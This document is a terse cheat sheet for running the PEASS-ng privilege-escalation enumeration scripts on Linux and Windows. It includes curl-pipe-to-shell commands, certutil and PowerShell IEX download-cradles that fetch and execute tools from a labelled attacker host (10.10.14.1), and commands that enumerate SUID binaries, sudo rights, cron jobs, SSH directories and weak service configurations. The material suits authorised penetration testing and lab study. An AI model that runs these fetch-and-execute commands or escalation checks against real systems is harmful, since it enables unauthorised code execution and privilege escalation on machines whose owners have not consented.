PEASS-ng scripts for automated local privilege escalation enumeration on Linux and Windows.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl -Lo linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
./linpeas.sh 2>/dev/null | tee linpeas_output.txt
./linpeas.sh -a
./linpeas.sh -s
./linpeas.sh -q
python3 -m http.server 8080 # on attacker; curl http://10.10.14.1:8080/linpeas.sh | sh
# Look for: Red/Yellow highlighted items first
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
sudo -l
cat /etc/crontab && ls -la /etc/cron*
find / -writable -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null
cat /etc/passwd | grep -v nologin | grep -v false
ss -tlnp && netstat -tlnp 2>/dev/null
ls -la /home && ls -la ~/.ssh/
.\winPEASx64.exe
.\winPEASx86.exe
.\winPEASx64.exe > winpeas_output.txt
.\winPEASx64.exe quiet
.\winPEASx64.exe systeminfo
.\winPEASx64.exe servicesinfo
certutil -urlcache -split -f http://10.10.14.1:8080/winPEASx64.exe winpeas.exe
IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.1:8080/winPEASx64.ps1")
whoami /priv
whoami /all
net user && net localgroup administrators
wmic service get name,startname,pathname,startmode 2>nul | findstr /i "auto" | findstr /i /v "c:\windows"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"